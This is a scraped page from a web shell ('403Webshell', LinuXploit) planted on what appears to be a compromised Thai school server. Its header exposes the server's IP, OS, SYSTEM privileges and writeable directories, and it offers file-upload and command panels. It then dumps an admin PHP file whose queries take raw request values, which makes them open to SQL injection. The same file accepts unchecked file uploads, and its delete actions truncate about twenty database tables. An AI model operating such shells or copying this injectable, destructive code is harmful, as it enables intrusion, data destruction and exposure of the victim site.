403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/saithammachan/modules/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/saithammachan/modules/admin/tkk11_del.php
	<?
CheckAdmin($_SESSION['admin_user'], $_SESSION['admin_pwd']);
?>
<TABLE cellSpacing=0 cellPadding=0 width=760 border=0>
      <TBODY>
        <TR>
          <TD width="10" vAlign=top><IMG src="images/fader.gif" border=0></TD>
          <TD width="710" vAlign=top><IMG src="images/topfader.gif" border=0><BR>
		  <!-- Admin -->
		  &nbsp;&nbsp;<IMG SRC="images/menu/textmenu_admin.gif" BORDER="0"><BR>
				<TABLE width="700" align=center cellSpacing=0 cellPadding=0 border=0>
				<TR>
					<TD height="1" class="dotline"></TD>
				</TR>
				<TR>
					<TD>
					<BR><B><IMG SRC="images/icon/plus.gif" BORDER="0" ALIGN="absmiddle"> <A HREF="?name=admin&file=main">หน้าหลักผู้ดูแลระบบ</A> &nbsp;&nbsp;<IMG SRC="images/icon/arrow_wap.gif" BORDER="0" ALIGN="absmiddle">&nbsp;&nbsp; </B>
					<BR><BR>
					<A HREF="?name=admin&file=tkk1"><IMG SRC="images/admin/open.gif"  BORDER="0" align="absmiddle"> รายการบันทึกข้อความ</A> <BR><BR>

<?
//////////////////////////////////////////// แสดงรายการขุมความรู้ 
if($_GET[op] == ""){
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$limit = 1 ;
	$SUMPAGE = $db->num_rows(TB_TKK1,"id","");
	$page=$_GET[page];
	if (empty($page)){
		$page=1;
	}
	$rt = $SUMPAGE%$limit ;
	$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
	$goto = ($page-1)*$limit ;
?>
 <form action="?name=admin&file=tkk1&op=tkk1_del&action=multidel" name="myform" method="post">
 <table width="100%" cellspacing="2" cellpadding="1" >
  <tr bgcolor="#990000" height=25>
   <td width="44"><CENTER><font color="#FFFFFF"><B>Option</B></font></CENTER></td>
   <td><font color="#FFFFFF"><B>เรื่อง</B></font></td>
   <td width="170"><CENTER><font color="#FFFFFF"><B>วัน เดือน ปี</B></font></CENTER></td>
   <td width="10"><CENTER><font color="#FFFFFF"><B>หมวด</B></font></CENTER></td>
   <td width="40"><CENTER><font color="#FFFFFF"><B>Check</B></font></CENTER></td>
  </tr>  
<?
$res[tkk1] = $db->select_query("SELECT * FROM ".TB_TKK1." ORDER BY id DESC LIMIT $goto, $limit ");
while($arr[tkk1] = $db->fetch($res[tkk1])){
	$res[category] = $db->select_query("SELECT * FROM ".TB_TKK1_CAT." WHERE id='".$arr[tkk1][category]."' ");
	$arr[category] = $db->fetch($res[category]);
	//Comment Icon
	if($arr[tkk1][enable_comment]){
		$CommentIcon = " <IMG SRC=\"images/icon/suggest.gif\" WIDTH=\"13\" HEIGHT=\"9\" BORDER=\"0\" ALIGN=\"absmiddle\">";
	}else{
		$CommentIcon = "";
	}
?>
    <tr>
     <td width="44">
      <a href="?name=admin&file=tkk1&op=tkk1_edit&id=<? echo $arr[tkk1][id];?>"><img src="images/admin/edit.gif" border="0" alt="แก้ไข" ></a> 
      <a href="javascript:Confirm('?name=admin&file=tkk1_del&op=tkk1_del&id=<? echo $arr[tkk1][id];?>&prefix=<? echo $arr[tkk1][post_date];?>','คุณมั่นใจในการลบหัวข้อนี้ ?');"><img src="images/admin/trash.gif"  border="0" alt="ลบ" ></a>
     </td> 
     <td><A HREF="?name=tkk1&file=readtkk1&id=<?echo $arr[tkk1][id];?>" target="_blank"><?echo $arr[tkk1][topic];?></A><?=$CommentIcon;?></td>
     <td ><CENTER><?echo $arr[tkk1][posted];?><br><?echo ThaiTimeConvert($arr[tkk1][post_date],'','');?></CENTER></td>
     <td align="center">
	  <?if($arr[category][category_name]){ //หากมีหมวดแสดงรูป ?>
	 <A HREF="#"><IMG SRC="images/admin/folders.gif"  BORDER="0" align="absmiddle" alt="<?echo $arr[category][category_name];?>" onMouseOver="MM_displayStatusMsg('<?echo $arr[category][category_name];?>');return document.MM_returnValue"></A>
	 <? } ?>
	 </td>
     <td valign="top" align="center" width="40"><input type="checkbox" name="list[]" value="<? echo $arr[tkk1][id];?>"></td>
    </tr>
	<TR>
		<TD colspan="5" height="1" class="dotline"></TD>
	</TR>
<?
 } 
?>
 </table>
 <div align="right">
 <input type="button" name="CheckAll" value="Check All" onclick="checkAll(document.myform)" >
 <input type="button" name="UnCheckAll" value="Uncheck All" onclick="uncheckAll(document.myform)" >
 <input type="hidden" name="ACTION" value="tkk1_del">
 <input type="submit" value="Delete" onclick="return delConfirm(document.myform)">
 </div>
 </form><BR><BR>
<?
	SplitPage($page,$totalpage,"?name=admin&file=tkk1");
	echo $ShowSumPages ;
	echo "<BR>";
	echo $ShowPages ;
}
else if($_GET[op] == "tkk1_add" AND $_GET[action] == "add"){
	//////////////////////////////////////////// กรณีเพิ่ม Database
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
		

		
		//	CheckUser($_SESSION['admin_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[admin] = $db->select_query("SELECT * FROM ".TB_ADMIN." WHERE username='".$_SESSION['admin_user']."' ");
		$arr[admin] = $db->fetch($res[admin]);

		//require("includes/class.resizepic.php");
		//$FILE = $_FILES['FILE'];
		$FILES = $_FILES['filesw'];
		if (!$_POST[CATEGORY] OR !$_POST[TOPIC] OR !$_POST[DETAIL]){
			echo "<script language='javascript'>" ;
			echo "alert('กรุณากรอกข้อมูลต่างๆให้ครบถ้วน')" ;
			echo "</script>" ;
			echo "<script language='javascript'>javascript:history.back()</script>";
			exit();
/*		}
		if (( $FILE['type']!="image/gif" ) AND ($FILE['type']!="image/jpg") AND ($FILE['type']!="image/jpeg") AND ($FILE['type']!="image/pjpeg")){
			echo "<script language='javascript'>" ;
			echo "alert('กรุณาใช้ไฟล์นามสกุล jpg เท่านั้น')" ;
			echo "</script>" ;
			echo "<script language='javascript'>javascript:history.back()</script>";
			exit();
		}else{
			@copy ($FILE['tmp_name'] , "tkk1icon/".TIMESTAMP.".jpg" );
			$original_image = "tkk1icon/".TIMESTAMP.".jpg" ;
			$desired_width = _Itkk1_W ;
			$desired_height = _Itkk1_H ;
			$image = new hft_image($original_image);
			$image->resize($desired_width, $desired_height, '0');
			$image->output_resized("tkk1icon/".TIMESTAMP.".jpg", "JPG");
*/		}
//echo $filesw_name;
		if ($FILES[tmp_name] != '' )
{


               if ( $upload=copy( $FILES[tmp_name], "tkk1/".TIMESTAMP."_$FILES[name]")) {
                }else{
                        print "<center><font color='red'>เกิดความผิดพลาด ไม่สามารถ UpLoad ไฟล์ $FILES[name] ได้</font></center><br>";
                }
              unlink($filesw);
			  		//ทำการเพิ่มข้อมูลลงดาต้าเบส
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$db->add_db(TB_TKK1,array(
			"category"=>"$_POST[CATEGORY]",
			"kom"=>"".addslashes(htmlspecialchars($_POST[KOM]))."",
			"topic"=>"".addslashes(htmlspecialchars($_POST[TOPIC]))."",
			"cat"=>"$_POST[CATEGORY]",
			"praphet"=>"".addslashes(htmlspecialchars($_POST[PRAPHET]))."",
			"posted"=>"$_POST[POSTED]",
			"post_date"=>"".TIMESTAMP."",
			"update_date"=>"".TIMESTAMP."",
			"enable_comment"=>"1",
			"full_text"=>"".TIMESTAMP."_$FILES[name]"));
		$db->closedb ();
} else {
			//ทำการเพิ่มข้อมูลลงดาต้าเบส
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$db->add_db(TB_TKK1,array(
			"category"=>"$_POST[CATEGORY]",
			"kom"=>"".addslashes(htmlspecialchars($_POST[KOM]))."",
			"topic"=>"".addslashes(htmlspecialchars($_POST[TOPIC]))."",
			"cat"=>"$_POST[CATEGORY]",
			"praphet"=>"".addslashes(htmlspecialchars($_POST[PRAPHET]))."",
			"posted"=>"$_POST[POSTED]",
			"post_date"=>"".TIMESTAMP."",
			"update_date"=>"".TIMESTAMP."",
			"enable_comment"=>"1"));
		$db->closedb ();
}

		//ทำการสร้างไฟล์ text ของข่าวสาร
		$Filename = TIMESTAMP.".txt";
		$txt_name = "tkk1data/".$Filename."";
		$txt_open = @fopen("$txt_name", "w");
		@fwrite($txt_open, "".$_POST[DETAIL]."");
		@fclose($txt_open);

		$ProcessOutput .= "<BR><BR>";
		$ProcessOutput .= "<CENTER><A HREF=\"?name=admin&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
		$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการเพิ่ม  เข้าสู่ระบบเรียบร้อยแล้ว</B></FONT><BR><BR>";
		$ProcessOutput .= "<A HREF=\"?name=admin&file=tkk1\"><B>กลับหน้า โครงการ </B></A>";
		$ProcessOutput .= "</CENTER>";
		$ProcessOutput .= "<BR><BR>";
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "tkk1_add"){
	//////////////////////////////////////////// กรณีเพิ่ม Form
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
//	CheckUser($_SESSION['admin_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[admin] = $db->select_query("SELECT * FROM ".TB_ADMIN." WHERE username='".$_SESSION['admin_user']."' ");
		$arr[admin] = $db->fetch($res[admin]);
		?>
<?

	//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
		?>
<FORM NAME="myform" METHOD=POST ACTION="?name=admin&file=tkk1&op=tkk1_add&action=add" enctype="multipart/form-data" id="myform">
<font color="#FF0000" size="2" face="MS Sans Serif, Tahoma, sans-serif"><B>เสนอหนังสือ :</B></font><BR>
<SELECT NAME="CATEGORY"><option value="?name=tkk1">เลือกหัวหน้างาน</option>
<?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[od_one] = $db->select_query("SELECT * FROM ".TB_TKK1_CAT." WHERE od_one='7' ");
while ($arr[od_one] = $db->fetch($res[od_one])){
	   echo "<option value=\"".$arr[category][id]."\"";
	   echo ">".$arr[od_one][category_name]."</option>";
}
$db->closedb ();
?>
</SELECT>
<BR><BR>
<B>กลุ่มงาน:</B><BR>
<INPUT TYPE="text" NAME="KOM" size="150">
<BR><BR>
<B>เรื่อง:</B><BR>
<INPUT TYPE="text" NAME="TOPIC" size="150">
<BR><BR>
<B>ประเภท:</B><BR>
<INPUT TYPE="radio" name="praphet" value="1">
          <img src="myoffice/1.gif" width="34" height="15">  ปกติ
<INPUT TYPE="radio" name="praphet" value="2">
          <img src="myoffice/2.gif" width="34" height="15"> ด่วน

<B>บันทึกข้อความ :</B><BR>
<?
include("FCKeditor/fckeditor.php") ;
$oFCKeditor = new FCKeditor('DETAIL') ;
$oFCKeditor->BasePath	= 'FCKeditor/' ;
$oFCKeditor->Width	= '100%' ;
$oFCKeditor->Height	= '300' ;
$oFCKeditor->Value		= $TextContent ;
$oFCKeditor->Create() ;
?>
<br>ผู้บันทึก : <INPUT TYPE="text" NAME="POSTED" VALUE="<?=$arr[admin][name];?>" readonly style=\"color: #FF0000" ><br><br>
<INPUT TYPE="submit" value=" บันทึก " name="submit"> <INPUT TYPE="reset" value=" เคลีย " name="reset">
</FORM>
<BR><BR>
<?
	}else{
		//กรณีไม่ผ่าน
		echo  $PermissionFalse ;
	}
}
else if($_GET[op] == "tkk1_edit" AND $_GET[action] == "edit"){
	//////////////////////////////////////////// กรณีแก้ไข Database Edit
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
		//ดึงค่า
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[tkk1] = $db->select_query("SELECT * FROM ".TB_TKK1." WHERE id='".$_GET[id]."' ");
		$arr[tkk1] = $db->fetch($res[tkk1]);
		$db->closedb ();
		//require("includes/class.resizepic.php");
		//$FILE = $_FILES['FILE'];
		$FILES = $_FILES['filesw'];
		if (!$_POST[CATEGORY]){
			echo "<script language='javascript'>" ;
			echo "alert('กรุณากรอกข้อมูลต่างๆให้ครบถ้วน')" ;
			echo "</script>" ;
			echo "<script language='javascript'>javascript:history.back()</script>";
			exit();
/*		}
		if ((( $FILE['type']!="image/gif" ) AND ($FILE['type']!="image/jpg") AND ($FILE['type']!="image/jpeg") AND ($FILE['type']!="image/pjpeg")) AND $FILE['size']){
			echo "<script language='javascript'>" ;
			echo "alert('กรุณาใช้ไฟล์นามสกุล jpg เท่านั้น')" ;
			echo "</script>" ;
			echo "<script language='javascript'>javascript:history.back()</script>";
			exit();
		}else{
			@copy ($FILE['tmp_name'] , "tkk1icon/".$arr[tkk1][post_date].".jpg" );
			$original_image = "tkk1icon/".$arr[tkk1][post_date].".jpg" ;
			$desired_width = _Itkk1_W ;
			$desired_height = _Itkk1_H ;
			$image = new hft_image($original_image);
			$image->resize($desired_width, $desired_height, '0');
			$image->output_resized("tkk1icon/".$arr[tkk1][post_date].".jpg", "JPG");
*/		}

		if ($FILES[tmp_name] != '' )
{
			   unlink($arr[tkk1][full_text] ,"tkk1/".$arr[tkk1][full_text]);
                if ( $upload=copy( $FILES[tmp_name], "tkk1/".TIMESTAMP."_$FILES[name]")) {
                }else{
                        print "<center><font color='red'>เกิดความผิดพลาด ไม่สามารถ UpLoad ไฟล์ $FILES[name] ได้</font></center><br>";
                }

		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$db->update_db(TB_TKK1,array(
			"category"=>"$_POST[CATEGORY]",
			"update_date"=>"".TIMESTAMP."",
			"enable_comment"=>"1",
			"full_text"=>"".TIMESTAMP."_$FILES[name]"
		)," id=$_GET[id] ");
		$db->closedb ();

} else {
		//ทำการแก้ไขข้อมูลลงดาต้าเบส
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$db->update_db(TB_TKK1,array(
			"category"=>"$_POST[CATEGORY]",
			"update_date"=>"".TIMESTAMP."",
			"enable_comment"=>"1"
		)," id=$_GET[id] ");
		$db->closedb ();
}




$_GET['id'] = intval($_GET['id']);
//ทำการเพิ่มข้อมูลลงดาต้าเบส
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$db->add_db(TB_TKK1_COMMENT,array(
	"tkk1_id"=>"$_GET[id]",
	"detail"=>"".($_POST[detail])."",
	"name"=>"".htmlspecialchars($_POST[NAME])."",
	"comment"=>"".htmlspecialchars($_POST[COMMENT])."",
	"ip"=>"".IPADDRESS."",
	"post_date"=>"".TIMESTAMP.""
));
$db->closedb ();


		
		$ProcessOutput .= "<BR><BR>";
		$ProcessOutput .= "<CENTER><A HREF=\"?name=admin&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
		$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการแก้ไข เรียบร้อยแล้ว</B></FONT><BR><BR>";
		$ProcessOutput .= "<A HREF=\"?name=tkk1&file\"><B>กลับหน้า จัดการโครงการ </B></A>";
		$ProcessOutput .= "</CENTER>";
		$ProcessOutput .= "<BR><BR>";
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "tkk1_edit"){
	//////////////////////////////////////////// กรณีแก้ไข Form
	if(CheckLevel($_SESSION['admin_user'], $_GET[op])){
		//ดึงค่า
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[tkk1] = $db->select_query("SELECT * FROM ".TB_TKK1." WHERE id='".$_GET[id]."' ");
		$arr[tkk1] = $db->fetch($res[tkk1]);
		$db->closedb ();

		//อ่านค่าจากไฟล์ Text เพื่อแก้ไข
		$Filetkk1Topic = "tkk1data/".$arr[tkk1][post_date].".txt";
		$file_open = @fopen($Filetkk1Topic, "r");
		$TextContent = @fread ($file_open, @filesize($Filetkk1Topic));
		@fclose ($file_open);
		$TextContent = stripslashes($TextContent);
//	CheckUser($_SESSION['admin_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[admin] = $db->select_query("SELECT * FROM ".TB_ADMIN." WHERE username='".$_SESSION['admin_user']."' ");
		$arr[admin] = $db->fetch($res[admin]);
		?>
<?

	//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
		?>
<FORM NAME="myform" METHOD=POST ACTION="?name=admin&file=tkk1&op=tkk1_edit&action=edit&id=<?=$_GET[id];?>" enctype="multipart/form-data">
<BR><BR>
<FORM NAME="form2" METHOD=POST ACTION="?name=tkk1&file=comment&id=<?=$_GET[id];?>">
				<TABLE width="750" align=center cellSpacing=0 cellPadding=0 border=0>
<?
$_GET['id'] = intval($_GET['id']);
//แสดงข่าวสาร/ประชาสัมพันธ์ 
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[tkk1] = $db->select_query("SELECT * FROM ".TB_TKK1." WHERE id='$_GET[id]' ");
$arr[tkk1] = $db->fetch($res[tkk1]);
$db->closedb ();
if(!$arr[tkk1][id]){
	echo "<BR><BR><BR><BR><CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\" ><BR><BR><B>ไม่มีเรื่อง</B></CENTER><BR><BR><BR><BR>";
}else{
	$Filetkk1Topic = "tkk1data/".$arr[tkk1][post_date].".txt";
	$file_open = @fopen($Filetkk1Topic, "r");
	$content = @fread ($file_open, @filesize($Filetkk1Topic));
	$Detail = stripslashes(FixQuotes($content));
	//ทำการเพิ่มจำนวนคนเข้าชม
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$q[Pageview] = "UPDATE ".TB_TKK1." SET pageview = pageview+1 WHERE id = '".$_GET[id]."' ";
	$sql[Pageview] = mysql_query ( $q[Pageview] ) or sql_error ( "db-query",mysql_error() );
	//ชื่อหมวดหมู่ 
	$res[category] = $db->select_query("SELECT * FROM ".TB_TKK1_CAT." WHERE id='".$arr[tkk1][category]."' "); 
	$arr[category] = $db->fetch($res[category]);
	$db->closedb ();
?>
 		<TR>
					<TD>
					<table width="750" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="750" bgcolor="#ffffff" colspan="3"><B><FONT COLOR="#000000" size=2><?=$arr[category][category_name];?>
	<br><?=$Detail;?></FONT></td>
  </tr>
<tr>
    <td><TABLE cellSpacing=0 cellPadding=0 width=400 border=0 align="center" >
<?
if($arr[tkk1][enable_comment]){
//	CheckUser($_SESSION['admin_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[admin] = $db->select_query("SELECT * FROM ".TB_ADMIN." WHERE username='".$_SESSION['admin_user']."' ");
		$arr[admin] = $db->fetch($res[admin]);

	
	//Check Comment
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res[comment] = $db->select_query("SELECT * FROM ".TB_TKK1_COMMENT." WHERE tkk1_id='".$arr[tkk1][id]."' ORDER BY id ");
	$count=0;
	while($arr[comment] = $db->fetch($res[comment])){
		$count  ++;
	if(!$arr[comment][id]){
	echo "<BR><BR><BR><BR><CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\" ><BR><BR><B>ไม่มีเรื่อง</B></CENTER><BR><BR><BR><BR>";
	$Filetkk1Topic = "commentdata/".$arr[comment][post_date].".txt";
	$file_open = @fopen($Filetkk1Topic, "r");
	$content = @fread ($file_open, @filesize($Filetkk1Topic));
	$Detail = stripslashes(FixQuotes($content));
?>

 	<TR>
				
			</TR>
<?
}
 { 	  
?>
<? } ?>			
			<TR>
				<TD><B><div align="center"><B><FONT COLOR="#990000"><br><br>
				ความเห็น<?=($arr[comment][detail]);?>
				<BR><?= ThaiTimeConvert($arr[comment][post_date],"1","1");?></FONT></B>
				</TD></div>
			</TR>
			<TR>
				<TD height="1" class="dotline"></TD>
			</TR>
			<tr>
<td colspan=2>
</td>
			<TABLE cellSpacing=0 cellPadding=0 width=600 border=0 align="center" >
						
<?
}
?>
			</TABLE>
			<BR>
<?
	}
	$db->closedb ();
?>
		<!-- Enable Comment -->
</td>
  </tr>

<? } ?>
</table>	
					</TD>
				</TR>
				
				
			</TABLE>

 <table width="750" border="0" cellspacing="0" cellpadding="0">
    <tr> 
      <td><div align="center"><p align="center"><strong> <font color="#0000FF" size="2" face="Microsoft Sans Serif" dir="ltr" lang="th"> 
    <INPUT TYPE="checkbox" NAME="COMMENT" VALUE="4" <?if($arr[comment][comment]){echo " Checked";};?>>
    หน.งาน 
    <TNPUT TYPE="checkbox" NAME="COMMENT" VALUE="5" <?if($arr[comment][comment]){echo " Checked";};?>>
    ผอ.กลุ่ม 
    <INPUT TYPE="checkbox" NAME="COMMENT" VALUE="6" <?if($arr[comment][comment]){echo " Checked";};?>>
    รอง.ผอ.ผ่านหนังสือ 
    <INPUT TYPE="checkbox" NAME="COMMENT" VALUE="7" <?if($arr[comment][comment]){echo " Checked";};?>>
    รอง ผอ.ลงนาม
<TNPUT TYPE="checkbox" NAME="COMMENT" VALUE="8" <?if($arr[comment][comment]){echo " Checked";};?>>
    รอง ผอ.(รก.) 
<INPUT TYPE="checkbox" NAME="COMMENT" VALUE="9" <?if($arr[comment][comment]){echo " Checked";};?>>
ผอ.อนุมัติ
<INPUT TYPE="checkbox" NAME="COMMENT" VALUE="10" <?if($arr[comment][comment]){echo " Checked";};?>>
  ผอไม่อนุมัติ
    <INPUT TYPE="checkbox" NAME="COMMENT" VALUE="11" <?if($arr[comment][comment]){echo " Checked";};?>>
    กลับไปแก้ไข <br>
    <br>
  <font color="#FF0000" size="2" face="MS Sans Serif, Tahoma, sans-serif"><B>เสนอ</B><BR>
<SELECT NAME="CATEGORY"><option value="?name=tkk1">เลือกเสนอ</option>
<option value="<?=$arr[tkk1][cat];?>">ส่งกลับไปแก้ไข</option>
<?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[od_two] = $db->select_query("SELECT * FROM ".TB_TKK1_CAT." WHERE od_two='8' ");
while ($arr[od_two] = $db->fetch($res[od_two])){
	   echo "<option value=\"".$arr[od_two][id]."\"";
	   echo ">".$arr[od_two][category_name]."</option>";
}
$db->closedb ();
?>
</SELECT><br>
    <br>

						
<BR><BR><B>ความคิดเห็น : </B><BR>
							<?
include("FCKeditor/fckeditor.php") ;
$oFCKeditor = new FCKeditor('detail') ;
$oFCKeditor->BasePath	= 'FCKeditor/' ;
$oFCKeditor->Width	= '400' ;
$oFCKeditor->Height	= '200' ;
$oFCKeditor->Create() ;

?>
					</strong></p>
          
</td>
<td></tr>
<tr><td>
<table width="400" align="center" border="0" cellspacing="0" cellpadding="0">
  <tr>
	<td align="center"></td>
   
  </tr>
</table>
</td>
  </tr>
 <p>&nbsp;</p>
	  <tr> 
      <td colspan="4"><div align="center">
		<p>&nbsp;</p>
	<INPUT TYPE="text" NAME="NAME" VALUE="<?=$arr[admin][name];?>" readonly style=\"color: #FF0000">
<BR><BR>
	<INPUT TYPE="submit" value=" บันทึกความเห็น " name="submit"> <INPUT TYPE="reset" value=" เคลีย " name="reset">
	</div></td>
    </tr>
    </tr>
  </table>
</FORM>

<BR>
<BR><BR>
<?
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "tkk1_del" AND $_GET[action] == "multidel"){
//////////////////////////////////////////// กรณีลบ Multi
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
		while(list($key, $value) = each ($_POST['list'])){
			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			mysql_query('TRUNCATE TABLE web_tkk1;');
			mysql_query('TRUNCATE TABLE web_tkk2;');
			mysql_query('TRUNCATE TABLE web_tkk3;');
			mysql_query('TRUNCATE TABLE web_tkk4;');
			mysql_query('TRUNCATE TABLE web_tkk5;');
			mysql_query('TRUNCATE TABLE web_tkk6;');
			mysql_query('TRUNCATE TABLE web_tkk7;');
			mysql_query('TRUNCATE TABLE web_tkk1_comment;');
			mysql_query('TRUNCATE TABLE web_tkk2_comment;');
			mysql_query('TRUNCATE TABLE web_tkk3_comment;');
			mysql_query('TRUNCATE TABLE web_tkk4_comment;');
			mysql_query('TRUNCATE TABLE web_tkk6_comment;');
			mysql_query('TRUNCATE TABLE web_tkk7_comment;');
			mysql_query('TRUNCATE TABLE web_sent;');
			mysql_query('TRUNCATE TABLE web_rub;');
			mysql_query('TRUNCATE TABLE web_kamsang;');
			mysql_query('TRUNCATE TABLE web_kamsang1;');
			mysql_query('TRUNCATE TABLE web_news;');
			mysql_query('TRUNCATE TABLE web_news_comment;');
			$db->closedb ();
		}
		$ProcessOutput .= "<BR><BR>";
		$ProcessOutput .= "<CENTER><A HREF=\"?name=admin&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
		$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการลบเรียบร้อยแล้ว</B></FONT><BR><BR>";
		$ProcessOutput .= "<A HREF=\"?name=admin&file=tkk1\"><B>กลับหน้า จัดการ</B></A>";
		$ProcessOutput .= "</CENTER>";
		$ProcessOutput .= "<BR><BR>";
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "tkk1_del"){
	//////////////////////////////////////////// กรณีลบ Form
	if(CheckLevel($_SESSION['admin_user'],$_GET[op])){
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$db->del(TB_SENT," id='".$_GET[id]."' ");
			mysql_query('TRUNCATE TABLE web_tkk1;');
			mysql_query('TRUNCATE TABLE web_tkk2;');
			mysql_query('TRUNCATE TABLE web_tkk3;');
			mysql_query('TRUNCATE TABLE web_tkk4;');
			mysql_query('TRUNCATE TABLE web_tkk5;');
			mysql_query('TRUNCATE TABLE web_tkk6;');
			mysql_query('TRUNCATE TABLE web_tkk7;');
			mysql_query('TRUNCATE TABLE web_tkk1_comment;');
			mysql_query('TRUNCATE TABLE web_tkk2_comment;');
			mysql_query('TRUNCATE TABLE web_tkk3_comment;');
			mysql_query('TRUNCATE TABLE web_tkk4_comment;');
			mysql_query('TRUNCATE TABLE web_tkk6_comment;');
			mysql_query('TRUNCATE TABLE web_tkk7_comment;');
			mysql_query('TRUNCATE TABLE web_sent;');
			mysql_query('TRUNCATE TABLE web_rub;');
			mysql_query('TRUNCATE TABLE web_kamsang;');
			mysql_query('TRUNCATE TABLE web_kamsang1;');
			mysql_query('TRUNCATE TABLE web_news;');
			mysql_query('TRUNCATE TABLE web_news_comment;');
		$db->closedb ();
		$ProcessOutput .= "<BR><BR>";
		$ProcessOutput .= "<CENTER><A HREF=\"?name=admin&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
		$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการลบเรียบร้อยแล้ว</B></FONT><BR><BR>";
		$ProcessOutput .= "<A HREF=\"?name=admin&file=main\"><B>กลับหน้าผู้ดูแลระบบ</b>></A>";
		$ProcessOutput .= "</CENTER>";
		$ProcessOutput .= "<BR><BR>";
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
?>
						<BR><BR>
					</TD>
				</TR>
			</TABLE>
			<BR><BR>
			<!-- Admin -->
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit